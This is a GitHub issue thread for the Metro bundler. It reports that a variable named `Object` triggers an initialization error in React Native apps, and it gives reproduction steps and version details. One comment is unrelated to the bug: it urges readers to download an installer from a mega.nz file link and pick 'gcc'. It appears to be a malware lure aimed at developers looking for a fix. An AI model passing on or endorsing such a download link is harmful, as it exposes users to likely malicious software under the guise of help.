### ISSUE TITLE
Uncaught Error: Cannot access 'Object' before initialization

### ISSUE THREAD

**Issue by itsyoboieltr** [facebook/metro#1331]
**Do you want to request a *feature* or report a *bug*?**

Bug

**What is the current behavior?**

If there is a variable named `Object`
```ts
const Object = '';
```
present in a react native app, it throws the error:

```ts
Uncaught Error
Cannot access 'Object' before initialization
```

Quoting from the original issue raised in: https://github.com/sinclairzx81/typebox/issues/968

> It is possible that the creation of a const Object = ... may be confusing the tooling where it may be interpreting the Object variable with globalThis.Object (which may or may not be polyfilled for the react native environment on build, I don't know). You should be able to repo the issue without by creating a Object variable (uppercase) and seeing if that triggers the error. I have seen similar behaviors before, but mostly they are related to something misbehaving in a tool or plugin somewhere.

**If the current behavior is a bug, please provide the steps to reproduce and a minimal repository on GitHub that we can `yarn install` and `yarn test`.**

1. Clone the repository of the minimal reproduction
```sh
git clone https://github.com/itsyoboieltr/bender-stack.git --branch object-error-reprod
```
2. Change directory to the repository
```sh
cd bender-stack
```
3. Install dependencies
```sh
bun i
```
4. Run the development server
```sh
bun dev
```
5. Open http://localhost:3000 in your browser to see the error message
6. (Optional) Comment the line `const Object = '';` to make the example not throw the error message

**What is the expected behavior?**

It should be possible to have a variable named Object, as this is a valid javascript variable name. Libraries are breaking using Metro (for example, TypeBox) due to this.

**Please provide your exact Metro configuration and mention your Metro, node, yarn/npm version and operating system.**

Metro: default expo metro config.
Node: v20.12.0
Bun: 1.1.26
Operating system: macOS, 14.5, 23F79

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by alexjalonso7777** [comment]
`[](url)`
